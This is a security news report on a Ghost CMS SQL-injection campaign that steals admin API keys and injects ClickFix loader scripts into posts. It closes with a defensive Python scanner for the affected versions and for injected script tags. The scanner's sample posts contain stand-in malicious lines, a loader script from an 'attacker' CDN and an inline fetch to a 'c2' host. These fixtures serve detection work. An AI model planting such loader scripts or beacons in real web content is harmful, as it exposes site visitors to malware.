A large-scale campaign is exploiting a critical SQL injection vulnerability in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. The campaign was discovered by XLab threat intelligence researchers, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs, according to Bleeping Computer.

The vulnerability, identified as CVE-2026-26980, affects Ghost versions 3.24.0 through 6.19.0, allowing unauthenticated attackers to steal admin API keys. These keys grant access to manage users, articles, and themes, enabling the injection of malicious JavaScript into website articles. This script acts as a loader, fetching further code from attacker infrastructure. Visitors who pass a fingerprinting verification are presented with a fake Cloudflare prompt, leading them to execute a command that installs malware, including DLL loaders, JavaScript droppers, and a malicious program called UtilifySetup.exe.

While a fix was released in Ghost CMS version 6.19.1 on February 19, many sites have not yet updated. The attack chain involves exploiting the SQL injection to gain elevated privileges, injecting a cloaking script, and then serving a ClickFix lure to unsuspecting users. To mitigate the risk, administrators are urged to upgrade to version 6.19.1 or later, rotate all potentially compromised API keys, and conduct thorough website reviews to remove malicious scripts.

Source: Bleeping Computer
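The two checks an administrator would run from the mitigation advice above, written here as an added example (not code from the article, from XLab, or from the Ghost project): a version test against the affected range 3.24.0 through 6.19.0, and a scan of post bodies for script tags that do not belong there. It assumes posts are available as JSON objects carrying an `html` field (the shape the Ghost Content API returns); the sample posts and the allowlist of embed hosts are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Affected range reported for CVE-2026-26980 (inclusive on both ends)
VULN_MIN, VULN_MAX = (3, 24, 0), (6, 19, 0)


def parse_version(v: str) -> tuple:
    """'v6.19.1' -> (6, 19, 1); only the first three numeric parts are used."""
    return tuple(int(p) for p in v.strip().lstrip("v").split(".")[:3])


def is_vulnerable(version: str) -> bool:
    """True when the installed Ghost version falls inside the affected range."""
    return VULN_MIN <= parse_version(version) <= VULN_MAX


class _ScriptFinder(HTMLParser):
    """Collects <script src=...> URLs and counts inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external_srcs, self.inline_count, self._in_script = [], 0, False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external_srcs.append(src)
        else:
            self._in_script = True  # body arrives via handle_data

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline_count += 1

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False


def find_injected_scripts(posts, allowed_hosts):
    """Return (post_id, src) for scripts loaded from non-allowlisted hosts
    (protocol-relative and same-origin paths included) and for inline scripts."""
    findings = []
    for post in posts:
        finder = _ScriptFinder()
        finder.feed(post.get("html") or "")
        for src in finder.external_srcs:
            if urlparse(src).hostname not in allowed_hosts:
                findings.append((post["id"], src))
        if finder.inline_count:
            findings.append((post["id"], "<inline script>"))
    return findings


# Constructed sample: one legitimate embed, one external loader, one inline script
SAMPLE_POSTS = [
    {"id": "p1", "html": '<p>Hi</p><script src="https://platform.twitter.com/widgets.js"></script>'},
    {"id": "p2", "html": '<p>Hi</p><script src="//cdn.attacker.invalid/loader.js"></script>'},
    {"id": "p3", "html": "<p>Hi</p><script>fetch('https://c2.invalid/x')</script>"},
]
ALLOWED_HOSTS = {"platform.twitter.com"}  # assumed allowlist of embed hosts
```

Any hit from `find_injected_scripts` warrants removing the script from the post and rotating the admin API keys, since the advisory ties the injection to stolen keys rather than to the editor.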